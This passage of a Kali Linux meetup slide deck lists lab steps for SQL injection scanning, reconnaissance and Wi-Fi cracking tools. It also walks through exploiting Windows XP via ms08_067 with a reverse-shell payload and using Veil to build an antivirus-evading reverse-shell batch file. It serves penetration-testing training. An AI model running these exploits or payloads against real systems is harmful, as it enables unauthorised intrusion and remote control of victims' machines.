    sqlmap On Kali sqlmap –uhttp://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
  • 121.
    Wasp Services From Kali– open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
  • 122.
    Web Services From Kali– open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
  • 123.
    whatweb From Kali  whatweb<Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
  • 124.
    Presentation on KaliLinux Lab #5 - msfconsole
  • 125.
    From Kali -msfconsole Presentation on Kali Linux
  • 126.
    msfconsole From Kali  servicepostgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
  • 127.
    msfconsole From [msf>] console help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
  • 128.
    msfconsole From [msf>] console search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
  • 129.
    msfconsole From [msf>] console,search for ‘unreal’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 130.
    msfconsole From [msf>] console(ex: unreal)  set RHOST <IP Address>  show options  exploit 
  • 131.
    msfconsole From [msf>] console,search for ‘twiki’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 132.
    msfconsole From [msf>] console(ex: ‘twiki’)  set RHOST <IP Address>  show options  exploit 
  • 133.
    msfconsole From [msf>] console,(target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
  • 134.
    msfconsole From [msf>] console,(target: Win XP)  show options  show advanced  show targets  show payloads
  • 135.
    msfconsole From [msf>] console,(target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
  • 136.
    msfconsole From [msf>] console,(target: Win XP)  show options  exploit  Any errors? 
  • 137.
    Presentation on KaliLinux Lab #6 – more GUI
  • 138.
    From Kali –more GUI Presentation on Kali Linux
  • 139.
    Zenmap Let’s run Zenmap Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
  • 140.
    SHODAN Let’s run SHODAN Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous…
  • 141.
    FERN Let’s run FERN Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
  • 142.
    recon-ng Kali has manybuilt-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
  • 143.
    recon-ng Let’s run recon-ng… cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
  • 144.
    recon-ng Let’s run recon-ng… set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules
  • 145.
    recon-ng Let’s run recon-ng… use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
  • 146.
    dmitry If you wantsomething more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s
  • 147.
    veil Kali has manybuilt-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
  • 148.
    veil Let’s run veil veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
  • 149.
    veil Let’s run veil 1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
  • 150.
    veil Let’s run veil Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
  • 151.
    Presentation on KaliLinux Final Thoughts
  • 153.
    Thank you Thank youfor your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859
  • 154.
  • 155.

Editor's Notes

  • #2 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #3 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #8 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #18 http://docs.kali.org/installation/kali-linux-hard-disk-install http://www.amazon.com/Alfa-Network-Wireless-802-11g-AWUS036H/dp/B000WXSO76/ref=pd_sim_b_70?ie=UTF8&refRID=0QQP45MG0MGTBQV2J5Q7
  • #19 http://www.kali.org/
  • #20 http://www.kali.org/
  • #21 http://www.kali.org/ http://cyberattacknews.wordpress.com/2014/04/30/kalilinux1-0-7/
  • #22 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #23 https://blog.bravi.org/?p=894 http://distrowatch.com/table.php?distribution=backbox http://en.wikipedia.org/wiki/Category:Linux_security_software http://www.techomech.com/penetration-testing-distribution/
  • #24 http://www.pentoo.ch/ GPGPU - General-purpose computing on graphics processing units http://www.tecmint.com/pentoo-linux-review-features-and-screenshot-tour/ http://www.techomech.com/penetration-testing-distribution/
  • #25 http://www.linux.com/directory/Distributions/security-enhanced/blackbuntu http://www.blackbuntu.com/ http://www.techomech.com/penetration-testing-distribution/
  • #26 http://www.linux.com/directory/Distributions/security-enhanced/engarde-secure-linux http://www.engardelinux.org/ http://www.techomech.com/penetration-testing-distribution/
  • #27 http://www.concise-courses.com/security/top-ten-distros/ http://www.blackmoreops.com/2014/02/03/notable-penetration-test-linux-distributions-of-2014/ http://blog.rootcon.org/2012/02/10-pentesting-linux-distributions-you.html http://www.slashgeek.net/2013/01/10/12-pentest-linux-distro/
  • #28 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #29 http://greece.mrdonn.org/greekgods/pandora.html
  • #31 http://www.kali.org/news/kali-linux-metapackages/
  • #32 http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.html http://www.hacking-tutorial.com/ http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/ http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ http://efytimes.com/e1/fullnews.asp?edid=121888
  • #33 http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.html http://www.hacking-tutorial.com/ http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/ http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ http://efytimes.com/e1/fullnews.asp?edid=121888
  • #34 https://pentest-tools.com/home http://www.softwaretestinghelp.com/penetration-testing-tools/ https://pentestmag.com/ http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/ http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/ https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/ http://www.security-audit.com/blog/penetration-testing-tools/ http://www.bulbsecurity.com/smartphone-pentest-framework/
  • #35 https://pentest-tools.com/home http://www.softwaretestinghelp.com/penetration-testing-tools/ https://pentestmag.com/ http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/ http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/ https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/ http://www.security-audit.com/blog/penetration-testing-tools/ http://www.bulbsecurity.com/smartphone-pentest-framework/
  • #36 http://kali4hackers.blogspot.com/ http://www.hackingwithkalilinux.tk/2013/08/kali-linux.html http://www.youtube.com/watch?v=3OM22HqvX14 http://www.kalilinux.net/community/threads/custome-command-prompt.243/ http://hackwithkalilinux.blogspot.com/ http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_tech http://www.markdubois.info/weblog/2014/02/kali-linux/ http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.html http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.html http://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  • #37 http://kali4hackers.blogspot.com/ http://www.hackingwithkalilinux.tk/2013/08/kali-linux.html http://www.youtube.com/watch?v=3OM22HqvX14 http://www.kalilinux.net/community/threads/custome-command-prompt.243/ http://hackwithkalilinux.blogspot.com/ http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_tech http://www.markdubois.info/weblog/2014/02/kali-linux/ http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.html http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.html http://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  • #38 http://docs.kali.org/pdf/kali-book-en.pdf https://eforensicsmag.com/from-backtrack-to-kalilinux/ http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&qid=1399928840&sr=8-1&keywords=kali+linux http://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&qid=1399928876&sr=8-2&keywords=kali+linux
  • #39 http://docs.kali.org/pdf/kali-book-en.pdf https://eforensicsmag.com/from-backtrack-to-kalilinux/ http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&qid=1399928840&sr=8-1&keywords=kali+linux http://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&qid=1399928876&sr=8-2&keywords=kali+linux
  • #40 http://www.kali.org/how-to/kali-linux-android-linux-deploy/ http://theunlockr.com/2010/11/29/how-to-root-the-samsung-galaxy-tab/ https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy&hl=en http://www.samsung.com/us/kies/ http://download.cnet.com/SuperOneClick/3000-2094_4-75447027.html http://www.youtube.com/watch?v=1739P-vds6E http://lifehacker.com/5664001/superoneclick-roots-virtually-every-android-phone-out-there
  • #41 http://www.kali.org/how-to/kali-linux-android-linux-deploy/ http://theunlockr.com/2010/11/29/how-to-root-the-samsung-galaxy-tab/ https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy&hl=en http://www.samsung.com/us/kies/ http://download.cnet.com/SuperOneClick/3000-2094_4-75447027.html http://www.youtube.com/watch?v=1739P-vds6E http://lifehacker.com/5664001/superoneclick-roots-virtually-every-android-phone-out-there
  • #42 http://www.kali.org/kali-linux-nethunter/
  • #43 http://www.kali.org/kali-linux-nethunter/
  • #44 http://lifehacker.com/how-to-hack-your-own-network-and-beef-up-its-security-w-1649785071
  • #45 http://www.raspberrypi.org/ http://www.raspberrypi.org/downloads/ http://www.offensive-security.com/kali-linux-vmware-arm-image-download/ http://en.wikipedia.org/wiki/Raspberry_Pi http://www.amazon.com/RASPBERRY-MODEL-756-8308-Raspberry-Pi/dp/B009SQQF9C http://lifehacker.com/tag/raspberry-pi
  • #48 http://sourceforge.net/projects/metasploitable/ http://www.offensive-security.com/metasploit-unleashed/Requirements https://community.rapid7.com/docs/DOC-1875 http://www.youtube.com/watch?v=UKppQMwoMdk http://www.securitygeeks.net/2013/04/how-to-install-backtrack-and.html
  • #49 http://sourceforge.net/projects/metasploitable/ http://www.offensive-security.com/metasploit-unleashed/Requirements https://community.rapid7.com/docs/DOC-1875 http://www.youtube.com/watch?v=UKppQMwoMdk http://www.securitygeeks.net/2013/04/how-to-install-backtrack-and.html
  • #50 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #76 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #81 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #82 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #85 http://sourceforge.net/projects/metasploitable/
  • #91 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #102 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #114 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #125 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #138 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #152 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio
  • #156 Presentation on Kali Linux TGodfrey – Falconer Technologies CleveSec MeetUp Group - Westlake, Ohio